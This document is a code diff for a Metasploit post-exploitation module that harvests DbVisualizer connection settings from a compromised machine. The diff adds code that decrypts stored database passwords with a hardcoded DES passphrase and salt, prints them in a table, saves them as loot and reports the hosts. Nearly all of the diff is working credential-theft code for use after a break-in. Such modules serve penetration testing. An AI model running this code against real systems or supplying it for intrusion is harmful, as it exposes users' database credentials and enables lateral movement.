Land rapid7#5429, Decrypt encrypted passwords in DBVisualizer

Author: wchen-r7

modules/post/multi/gather/dbvis_enum.rb

@@ -5,6 +5,8 @@
 
 require 'msf/core'
 require 'msf/core/auxiliary/report'
+require 'openssl'
+require 'digest/md5'
 
 class Metasploit3 < Msf::Post
 
@@ -17,25 +19,29 @@ def initialize(info={})
         'Name'          => 'Multi Gather DbVisualizer Connections Settings',
         'Description'   => %q{
           DbVisualizer stores the user database configuration in dbvis.xml.
-          This module retrieves the connections settings from this file.
+          This module retrieves the connections settings from this file and decrypts the encrypted passwords.
         },
         'License'       => MSF_LICENSE,
         'Author'        => [ 'David Bloom' ], # Twitter: @philophobia78
         'Platform'      => %w{ linux win },
         'SessionTypes'  => [ 'meterpreter', 'shell']
       ))
+    register_options(
+      [
+        OptString.new('PASSPHRASE', [false, 'The hardcoded passphrase used for encryption']),
+        OptInt.new('ITERATION_COUNT', [false, 'The iteration count used in key derivation', 10])
+      ], super.class)
   end
 
   def run
 
-
     oldversion = false
 
     case session.platform
     when /linux/
-      user = session.shell_command("whoami").chomp
+      user = session.shell_command('whoami').chomp
       print_status("Current user is #{user}")
-      if (user =~ /root/)
+      if user =~ /root/
         user_base = "/root/"
       else
          user_base = "/home/#{user}/"
@@ -50,11 +56,10 @@ def run
       dbvis_file = user_profile + "\\.dbvis\\config70\\dbvis.xml"
     end
 
-
     unless file?(dbvis_file)
       # File not found, we next try with the old config path
       print_status("File not found: #{dbvis_file}")
-      print_status("This could be an older version of dbvis, trying old path")
+      print_status('This could be an older version of dbvis, trying old path')
       case session.platform
       when /linux/
         dbvis_file = "#{user_base}.dbvis/config/dbvis.xml"
@@ -68,7 +73,6 @@ def run
       oldversion = true
     end
 
-
     print_status("Reading: #{dbvis_file}")
     print_line()
     raw_xml = ""
@@ -89,20 +93,14 @@ def run
     end
 
     if db_table.rows.empty?
-      print_status("No database settings found")
+      print_status('No database settings found')
     else
-      print_line("\n")
+      print_line
       print_line(db_table.to_s)
-      print_good("Try to query listed databases with dbviscmd.sh (or .bat) -connection <alias> -sql <statements> and have fun !")
+      print_good('Try to query listed databases with dbviscmd.sh (or .bat) -connection <alias> -sql <statements> and have fun!')
       print_line()
-      # store found databases
-      p = store_loot(
-        "dbvis.databases",
-        "text/csv",
-        session,
-        db_table.to_csv,
-        "dbvis_databases.txt",
-        "dbvis databases")
+      # Store found databases in loot
+      p = store_loot('dbvis.databases', 'text/csv', session, db_table.to_csv, 'dbvis_databases.txt', 'dbvis databases')
       print_good("Databases settings stored in: #{p.to_s}")
     end
 
@@ -111,12 +109,11 @@ def run
     print_good "dbvis.xml saved to #{p.to_s}"
   end
 
-
   # New config file parse function
   def parse_new_config_file(raw_xml)
 
     db_table = Rex::Ui::Text::Table.new(
-    'Header'    => "Dbvis Databases",
+    'Header'    => "DbVisualizer Databases",
     'Indent'    => 2,
     'Columns'   =>
     [
@@ -126,18 +123,19 @@ def parse_new_config_file(raw_xml)
       "Port",
       "Database",
       "Namespace",
-      "Userid",
+      "UserID",
+      "Password"
     ])
 
     dbs = []
     db = {}
     dbfound = false
-    versionFound = false
+    version_found = false
     # fetch config file
     raw_xml.each_line do |line|
 
-      if versionFound == false
-         vesrionFound = find_version(line)
+      if version_found == false
+        version_found = find_version(line)
       end
 
       if line =~ /<Database id=/
@@ -157,37 +155,43 @@ def parse_new_config_file(raw_xml)
 
       if dbfound == true
         # get the alias
-        if (line =~ /<Alias>([\S+\s+]+)<\/Alias>/i)
+        if line =~ /<Alias>([\S+\s+]+)<\/Alias>/i
           db[:Alias] = $1
         end
 
         # get the type
-        if (line =~ /<Type>([\S+\s+]+)<\/Type>/i)
+        if line =~ /<Type>([\S+\s+]+)<\/Type>/i
           db[:Type] = $1
         end
 
         # get the user
-        if (line =~ /<Userid>([\S+\s+]+)<\/Userid>/i)
-          db[:Userid] = $1
+        if line =~ /<Userid>([\S+\s+]+)<\/Userid>/i
+          db[:UserID] = $1
+        end
+
+        # get user password
+        if line =~ /<Password>([\S+\s+]+)<\/Password>/i
+          enc_password = $1
+          db[:Password] = decrypt_password(enc_password)
         end
 
         # get the server
-        if (line =~ /<UrlVariable UrlVariableName="Server">([\S+\s+]+)<\/UrlVariable>/i)
+        if line =~ /<UrlVariable UrlVariableName="Server">([\S+\s+]+)<\/UrlVariable>/i
           db[:Server] = $1
         end
 
         # get the port
-        if (line =~ /<UrlVariable UrlVariableName="Port">([\S+]+)<\/UrlVariable>/i)
+        if line =~ /<UrlVariable UrlVariableName="Port">([\S+\s+]+)<\/UrlVariable>/i
           db[:Port] = $1
         end
 
         # get the database
-        if (line =~ /<UrlVariable UrlVariableName="Database">([\S+\s+]+)<\/UrlVariable>/i)
+        if line =~ /<UrlVariable UrlVariableName="Database">([\S+\s+]+)<\/UrlVariable>/i
           db[:Database] = $1
         end
 
         # get the Namespace
-        if (line =~ /<UrlVariable UrlVariableName="Namespace">([\S+\s+]+)<\/UrlVariable>/i)
+        if line =~ /<UrlVariable UrlVariableName="Namespace">([\S+\s+]+)<\/UrlVariable>/i
           db[:Namespace] = $1
         end
       end
@@ -196,40 +200,40 @@ def parse_new_config_file(raw_xml)
     # Fill the tab and report eligible servers
     dbs.each do |db|
       if ::Rex::Socket.is_ipv4?(db[:Server].to_s)
-        print_good("Reporting #{db[:Server]} ")
+        print_good("Reporting #{db[:Server]}")
         report_host(:host =>  db[:Server]);
       end
 
-      db_table << [ db[:Alias] , db[:Type] , db[:Server], db[:Port], db[:Database], db[:Namespace], db[:Userid]]
+      db_table << [ db[:Alias], db[:Type], db[:Server], db[:Port], db[:Database], db[:Namespace], db[:UserID], db[:Password] ]
     end
     return db_table
   end
 
-
   # New config file parse function
   def parse_old_config_file(raw_xml)
 
     db_table = Rex::Ui::Text::Table.new(
-    'Header'    => "Dbvis Databases",
+    'Header'    => 'DbVisualizer Databases',
     'Indent'    => 2,
     'Columns'   =>
     [
-      "Alias",
-      "Type",
-      "Url",
-      "Userid",
+      'Alias',
+      'Type',
+      'URL',
+      'UserID',
+      'Password'
     ])
 
     dbs = []
     db = {}
     dbfound = false
-    versionFound = false
+    version_found = false
 
     # fetch config file
     raw_xml.each_line do |line|
 
-      if versionFound == false
-         vesrionFound = find_version(line)
+      if version_found == false
+         vesrion_found = find_version(line)
       end
 
       if line =~ /<Database id=/
@@ -243,48 +247,84 @@ def parse_old_config_file(raw_xml)
 
       if dbfound == true
         # get the alias
-        if (line =~ /<Alias>([\S+\s+]+)<\/Alias>/i)
+        if line =~ /<Alias>([\S+\s+]+)<\/Alias>/i
           db[:Alias] = $1
         end
 
         # get the type
-        if (line =~ /<Type>([\S+\s+]+)<\/Type>/i)
+        if line =~ /<Type>([\S+\s+]+)<\/Type>/i
           db[:Type] = $1
         end
 
         # get the user
-        if (line =~ /<Userid>([\S+\s+]+)<\/Userid>/i)
-          db[:Userid] = $1
+        if line =~ /<Userid>([\S+\s+]+)<\/Userid>/i
+          db[:UserID] = $1
         end
 
-        # get the user
-        if (line =~ /<Url>([\S+\s+]+)<\/Url>/i)
-          db[:Url] = $1
+        #get the user password
+        if line =~ /<Password>([\S+\s+]+)<\/Password>/i
+          enc_password = $1
+          db[:Password] = decrypt_password(enc_password)
         end
+
+        # get the server URL
+        if line =~ /<Url>(\S+)<\/Url>/i
+          db[:URL] = $1
+        end
+
       end
     end
 
     # Fill the tab
     dbs.each do |db|
-      if (db[:Url] =~ /[\S+\s+]+[\/]+([\S+\s+]+):[\S+]+/i)
+      if (db[:URL] =~ /[\S+\s+]+[\/]+([\S+\s+]+):[\S+]+/i)
         if ::Rex::Socket.is_ipv4?($1.to_s)
           print_good("Reporting #{$1}")
           report_host(:host => $1.to_s)
         end
       end
-      db_table << [ db[:Alias] , db[:Type] , db[:Url], db[:Userid] ]
+      db_table << [ db[:Alias] , db[:Type] , db[:URL], db[:UserID], db[:Password] ]
     end
     return db_table
   end
 
-
   def find_version(tag)
     found = false
-    if (tag =~ /<Version>([\S+\s+]+)<\/Version>/i)
-      print_good("DbVisualizer version :  #{$1}")
+    if tag =~ /<Version>([\S+\s+]+)<\/Version>/i
       found = true
+      print_good("DbVisualizer version: #{$1}")
+    end
+    found
+  end
+
+  def decrypt_password(enc_password)
+    enc_password = Rex::Text.decode_base64(enc_password)
+    dk, iv = get_derived_key
+    des = OpenSSL::Cipher.new('DES-CBC')
+    des.decrypt
+    des.key = dk
+    des.iv = iv
+    password = des.update(enc_password) + des.final
+  end
+
+  def get_derived_key
+    key = passphrase + salt
+    iteration_count.times do
+      key = Digest::MD5.digest(key)
     end
-    return found
+    return key[0,8], key[8,8]
+  end
+
+  def salt
+    [-114,18,57,-100,7,114,111,90].pack('C*')
+  end
+
+  def passphrase
+    datastore['PASSPHRASE'] || 'qinda'
+  end
+
+  def iteration_count
+    datastore['ITERATION_COUNT'] || 10
   end
 
 end